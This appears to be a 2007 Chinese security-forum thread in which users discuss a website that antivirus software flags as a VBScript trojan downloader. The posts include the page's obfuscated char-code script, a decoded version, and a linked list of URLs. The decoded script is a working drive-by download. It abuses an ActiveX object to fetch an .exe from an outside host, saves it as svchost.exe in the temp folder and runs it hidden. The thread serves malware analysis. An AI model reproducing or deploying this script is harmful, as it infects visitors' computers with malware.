一个毒网不知道有没有人发过。。。

显示全部楼层 · 发表于 2007-4-2 16:43:09

已检测到: 木马程序 Trojan-Downloader.VBS.Small.dk URL: http://www.xiaoshuowang.com.cn/url.html
已检测到: 木马程序 Trojan-Downloader.VBS.Small.dk URL: http://www.xiaoshuowang.com.cn/y.html
卡巴报毒

显示全部楼层 · 发表于 2007-4-2 16:52:31

LZ发样本吧。。。。。这样最实在

显示全部楼层 · 发表于 2007-4-2 16:54:07

我的卡巴已经禁止了没法搞到样本。。。。

显示全部楼层 · 发表于 2007-4-2 16:55:42

偶进去之后什么也没有发现。。。。

显示全部楼层 · 发表于 2007-4-2 16:57:20

Mon Apr 02 16:56:06 2007 url.html 这个

y.html 这个的

<html>
<script language="VBScript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="32,32,32,32,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,32,32,32,32,109,49,61,34,111,98,106,101,99,116,34,13,10,32,32,32,32,109,50,61,34,99,108,97,115,115,105,100,34,13,10,32,32,32,32,109,51,61,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,109,52,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,32,32,32,32,109,53,61,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,

显示全部楼层 · 发表于 2007-4-2 20:35:43

貌似见过，不过忘了，而那两个都是一样的东西，样本从下面可以看出是http://xiaoshuowang.com.cn/a4.exe

on error resume next
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripti"&"ng.Fil"&"eSystemObject"
Set xasonc = document.createElement(m1)
xason = "http://xiaoshuowang.com.cn/a4.exe"
xasonc.setAttribute m2, m3
xasoni=m4
Set xasond = xasonc.CreateObject(xasoni,"")
yhangf="Ado"
yhangg="db."
yhangh="Str"
yhangi="eam"
xasonf=yhangf&yhangg&yhangh&yhangi
xasong=xasonf
set xasona = xasonc.createobject(xasong,"")
xasona.type = 1
xasonh="G"&"E"&"T"
xasond.Open xasonh, xason, False
xasond.Send
xason9="svchost.exe"
set xasonb = xasonc.createobject(m6,"")
set xasone = xasonb.GetSpecialFolder(2)
xasona.open
xason8="xasona.BuildPath(xasona,xason8)"
xason7="xasonb.BuildPath(xasonb,xason7)"
xason6="xasonc.BuildPath(xasond,xason6)"
xason5="xasond.BuildPath(xasonf,xason5)"
xason4="xasone.BuildPath(xasong,xason4)"
xason3="xasonf.BuildPath(xasonh,xason4)"
xason2="xasong.BuildPath(xasoni,xason3)"
xason1="xasonh.BuildPath(xasong,xason1)"
xason0="xasoni.BuildPath(xasonk,xason0)"
xason9= xasonb.BuildPath(xasone,xason9)
xasona.write xasond.responseBody
xasona.savetofile xason9,2
xasona.close
set xasone = xasonc.createobject(m5,"")
xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",0

显示全部楼层 · 发表于 2007-4-2 20:57:26

卡巴报警...

显示全部楼层 · 发表于 2007-4-2 21:11:07

使用卡巴的人虽多,了解他的人却不多

显示全部楼层 · 发表于 2007-4-2 21:20:58

那个样本有人分析了没？
其中有个关联到一个叫asia.txt的文件，谁能找出来（网络上的）

显示全部楼层 · 发表于 2007-4-2 21:25:41

http://ctrl.82982.com/asia.txt

里面的内容：
http://asiafind.com/go/g831555-pmem+reg
http://asiafind.com/go/g849358-pmem+reg
http://asiafind.com/go/g849359-pmem+reg
http://asiafind.com/go/g849361-pmem+reg
http://asiafind.com/go/g796367-pmem+reg

[病毒样本] 一个毒网不知道有没有人发过。。。

本帖子中包含更多资源